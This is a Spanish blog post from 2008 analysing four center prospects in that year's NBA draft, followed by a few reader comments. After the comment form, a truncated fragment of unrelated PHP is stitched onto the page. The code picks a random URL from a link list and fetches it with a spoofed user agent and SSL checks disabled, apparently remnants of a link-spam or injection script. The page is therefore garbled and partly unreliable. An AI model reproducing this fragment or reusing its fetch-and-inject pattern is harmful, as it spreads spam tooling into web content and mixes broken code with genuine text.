Draft 2008. Análisis de los mejores Centers.

22 de June de 2008 por Dantley

Tras el análisis de los guards y los forwards cerramos esta serie con los centers. Este año viene cargado de buenos proyectos. Incluso fuera de los cuatro que hemos seleccionado como más probables para ser top-10, otros candidatos como Robin López y Kosta Koufos pueden aspirar a lotería. Como suele ser habitual, en la primera ronda del draft se elegirán a varios centers de escaso presente e incierto futuro. Pasemos a ver los más interesantes.

Brook López. 20 años. 2’13m.

7 pies, buen juego ofensivo, buena cabeza. En teoría esa combinación le deberían llevar al top-5 del draft 2008. La capacidad de pegarse con sus defensores y salir airoso casi sin ayuda ha sido una constante en el juego del jugador de Stanford. No es la variedad de movimientos lo que le hace peligroso en ataque sino la capacidad para fijar a su defensor y la coordinación de sus movimientos. Adicionalmente, Brook López tiene un buen tiro de 4 metros que, en numerosas ocasiones, apoya en tablero recordando –sólo recordando- a Tim Duncan.

En Stanford ha sido la referencia permanente en ataque. Debido a ello, la selección de tiro no ha sido siempre la más adecuada y sus porcentajes no son los que se esperan de un jugador con tan buen juego de ataque. Otra interrogante es su velocidad. Bien es cierto que como center no será la cualidad más necesaria, pero tendrá dificultad para seguir a su par en jugadas de transición y contraataques. Sirva como referencia las mediciones oficiales realizadas recientemente en Orlando donde Brook ha sido el más lento tanto en carrera frontal como lateral. Sin duda este dato hará que algunos equipos analicen con detenimiento esta limitación.

Su envergadura y posicionamiento le haría acreedor a ser un gran reboteador. Sin embargo, en esta parcela simplemente cumple, en parte por la falta de agresividad y en otra parte por una capacidad de salto limitada. En defensa, la falta de velocidad también le juega malas pasadas frente a centers más livianos, aunque tiene la corpulencia necesaria para mantener la posición sin problemas. No tiene la intensidad defensiva que su hermano gemelo Robin aporta, pero tiene un buen margen de mejora.

En resumen, son estas deficiencias las que, probablemente, sacarán a Brook López de los cinco primeros puestos del draft. No obstante, su envergadura y su juego de ataque le harán útiles durante una larga carrera profesional.

Kevin Love. 19 años. 2’06m.

Para quien esto escribe, Kevin Love es el mejor jugador de baloncesto que se presenta a este draft. Cierto es que no tiene la capacidad atlética de Anthony Randolph o la envergadura de Brook López, pero no es menos cierto que hay grandes ejemplos en la historia de la NBA en los que el talento ha sobrepasado a las limitaciones físicas. No obstante, Kevin Love está trabajando durante los workouts para demostrar una velocidad y una resistencia que se le han puesto en duda durante su único año en UCLA.

Con su teórica falta de velocidad, Kevin Love tendrá difícil jugar de 4 como le podría corresponder por su estatura, probablemente por debajo de los 6’9” que se le otorgan. Igualmente, dicha estatura, pese a sus 115 kilos le dejaran en una posición de debilidad si juega de center. En estos momentos, nos inclinamos más a pensar en Love como un center al estilo de Rasheed Wallace que ocupa esa falsa posición para salir a posiciones más exteriores creando problemas a su defensor. El buen tiro exterior de Love le permite sacar a sus defensores de la zona, si bien en la NCAA ha tenido grandes problemas en partidos concretos para superar a defensores de más altura.

El repertorio en ataque de Love es inmenso. Los movimientos en el poste bajo son exquisitos y los acompaña con la constante amenaza de un buen pase, en ocasiones de una espectacularidad que no se recordaba en hombres altos desde los tiempos de Sabonis.

En defensa es donde Kevin Love presenta sus mayores problemas. A la falta de agilidad se le une cierta falta de actitud, aunque probablemente ser el jugador de referencia en su equipo en ataque también afectara a su defensa. Precisamente de la capacidad que tenga Love de no ser una carga en defensa dependerán los minutos de los que disponga en sus primeros años.

En resumen, Kevin Love es un jugador de baloncesto en toda su expresión, aunque eso no le asegura una carrera de estrella en la NBA donde el físico juega un papel mucho más relevante que en el basket universitario.

DeAndre Jordan. 19 años. 2’13m.

Estamos ante, probablemente, el jugador más imponente desde el punto de vista de su potencial físico. Un 7 pies de gran velocidad y agilidad no es fácil que pase desapercibido, más cuando cada vez se draftea más por potencial que por la aportación inmediata que un jugador pueda hacer. La postal de DeAndre Jordan impresiona en la cancha. Algunas de sus canastas son ya clásicos del YouTube. Obviamente la comparación con Dwight Howard está siempre flotando en el ambiente.

A su portentoso físico se le unen ciertos detalles que dan pie a la esperanza, especialmente su juego en transición y un buen control del cuerpo entrando a canasta.

Sin embargo, Jordan es probablemente el jugador que más potencial tiene también de ser un absoluto fracaso. A día de hoy, DeAndre es un pésimo jugador de baloncesto. Ha promediado 8 puntos y 6 rebotes en su primer año en la NCAA, dando la sensación en todo momento de estar muy lejos de contribuir a las victorias de su equipo. Llama la atención su escaso 44% en tiros libres que habla claramente del mal tiro del jugador. Su capacidad de pase es prácticamente nula.

En defensa asusta más que defiende. Es poco agresivo y pierde la posición con facilidad.

En años anteriores algunos equipos han apostado en posiciones muy altas del draft por este tipo de candidatos. Son conocidas las apuestas de Seattle en los últimos años y conocido es el resultado de las mismas. Es bastante improbable que DeAndre Jordan sea un jugador útil en los próximos tres o cuatro años –y dudoso que lo sea durante su carrera, pero siempre habrá algún equipo al que le merezca la pena apostar a tener el próximo Bynum.

Javale McGee. 20 años. 2’13m.

Al igual que DeAndre Jordan, Javale McGee es uno de esos candidatos cuya posición en el draft va a depender más del potencial que de su juego actual. El primer gran argumento de McGee es su tamaño. Con 7 pies reales y unos brazos larguísimos, McGee fue el primero en las mediciones oficiales en el apartado de “standing reach”, es decir, la altura que alcanza el brazo extendido a pie quieto. Por tanto, la intimidación en defensa se le da por supuesta.

No obstante, a diferencia de Jordan, McGee ha mostrado una variedad de movimientos y un control de balón que le hace estar más cerca de los típicos 7 pies europeos. Parte de dicho arsenal es muy posible que le venga de sus padres, ambos jugadores profesionales hace unos años. El problema es la tremenda inconsistencia que Javale muestra. Por ejemplo es capaz de encestar con bastante calidad desde 5 metros, pero su porcentaje de tiros libres supera por poco el 50%. Aún así ha promediado 14 puntos en 27 minutos. Es probable que dicha inconsistencia pudiera tener que ver con cierta falta de madurez y concentración.

En defensa, como comentábamos al principio, es un intimidador. Casi 3 tapones por partido son la prueba. Sin embargo, en el momento en el que entre a la NBA pasará a ser uno de los peores defensores en el puesto de center. Sus movimientos laterales son lentos, su agresividad escasa y tiende a buscar la solución rápida del tapón. De hecho, su cifra de rebotes, poco más de 7, está muy por debajo de lo que se podría esperar de su envergadura.

En resumen, McGee es una elección muy arriesgada. Su aportación presente será muy escasa y, probablemente, juegue la mayor parte de sus minutos, en la liga de desarrollo durante los dos años que permite la normativa actual. No obstante, es un proyecto muy interesante que difícilmente será drafteado fuera de la lotería.

Comenta

4 comentarios a esta entrada

  1. Jabho dice:
    #1

    Por el bien del baloncesto espero que Love triunfe y sea All Star. El y Rose son lo mejor de este draft….

      Citar

  2. Viva_Dirk dice:
    #2

    Poco que decir de los centers, a ver cuantos equipos dejan pasar a Brook Lopez.

    El mejor jugador del draft es OJ Mayo, aunque Rose ha dejado unas sensaciones impresionantes en la NCAA.

      Citar

  3. Dantley dice:
    #3

    A Brook López le han hecho mucho daño los workouts y las mediciones. Demasiado lento, aunque tampoco es que dependa de su velocidad para anotar

      Citar

  4. planetbasket.net dice:
    #4

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>